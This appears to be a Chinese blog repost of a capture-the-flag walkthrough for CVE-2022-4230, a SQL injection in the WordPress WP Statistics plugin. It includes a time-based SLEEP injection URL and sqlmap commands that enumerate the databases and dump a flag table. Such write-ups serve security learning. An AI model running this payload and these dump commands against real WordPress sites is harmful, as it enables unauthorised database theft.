当前位置: 首页 > article >正文

CVE-2022-4230

打开什么都没有

使用dirsearch扫描到一个wp-admin

访问wp-admin是一个登陆页面

账号密码都在标题中

登陆后是这个页面

在WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com)中,里边有一段对漏洞的描述。

https://wpscan.com/vulnerability/a0e40cfd-b217-481c-8fc4-027a0a023312/

Log in as a user allowed to View WP Statistic and get a nonce via

https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:

http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

                        

翻译一下就是

以允许查看WP统计信息的用户身份登录,并通过获取随机数

https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

并在下面的URL中使用它,该URL将延迟5s

首先通过访问(必须要先登录过后台才行)

访问admin-ajax.php?action=rest-nonce

获得随机数706973b8cb

用浏览器访问,查看一下效果,其中 _wpnonce 的值是上面刚刚获取的随机数

访问:

wp-json/wp-statistics/v2/metabox?_wpnonce=63d5d76be3&name=words&search_engine=aaa

使用bp抓包,右键复制文件到本地

使用sqlmap,爆数据库

Python sqlmap.py -r 保存的文件名 --batch -dbs

爆出来四个库,其中的wordpress库很可疑

爆表

Python sqlmap.py -r 1.txt(保存的文件名) -D wordpress(库名) --tables --batch

爆字段

sqlmap -r 1.txt(保存的文件名) --batch -D wordpress(库名) -T flag(表名) --columns

爆字段数据

Python sqlmap.py -r 1.txt(保存的文件名) --batch

-D wordpress(库名) -T flag(表名) -C flag(字段名) --dump

或者直接省略爆字段名和字段数据直接使用下边的,知道表名就可以得出flag

python sqlmap.py -r 1.txt(保存的文件名) -D atomcms(库名) -T flag(表名) --dump -v --batch


http://www.kler.cn/a/408832.html

相关文章:

  • flatter算法详解
  • MariaDB面试题及参考答案
  • 用 Python 从零开始创建神经网络(九):反向传播(Backpropagation)
  • 【Rhino】【Python】Create a series of Blocks according to Value of object Property
  • C++:用红黑树封装map与set-1
  • 数据指标与标签在数据分析中的关系与应用
  • AWS云安全
  • 机器翻译基础与模型 之四:模型训练
  • 高新技术行业中的知识管理:关键性、挑战、策略及工具应用
  • Bug:gomonkey系列问题(undefined: buildJmpDirective)
  • 使用MQTTX连接新版ONENet
  • 实验室管理软件:Spring Boot技术构建
  • linux 查看端口占用 netstat, lsof, ss, fuser 笔记241123
  • 【Pytest+Yaml+Allure】实现接口自动化测试框架
  • 【深度学习】Pytorch 1.x 安装命令
  • openssl创建自签名证书
  • 从一个“支付状态不一致“的bug,看大型分布式系统的“隐藏杀机“
  • 数据集-目标检测系列- 牵牛花 检测数据集 morning_glory >> DataBall
  • HTTP 消息结构
  • 2024年亚太地区数学建模大赛D题-探索量子加速人工智能的前沿领域
  • 香港服务器安装Debian12操作系统有python环境嘛
  • go 结构体指针
  • tcpdump抓包 wireShark
  • Android Studio更改项目使用的JDK
  • vscode可以编译通过c++项目,但头文件有红色波浪线的问题
  • 基于YOLOv8深度学习的智慧考场考试防作弊行为检测系统设计与实现(PyQt5界面+数据集+训练代码)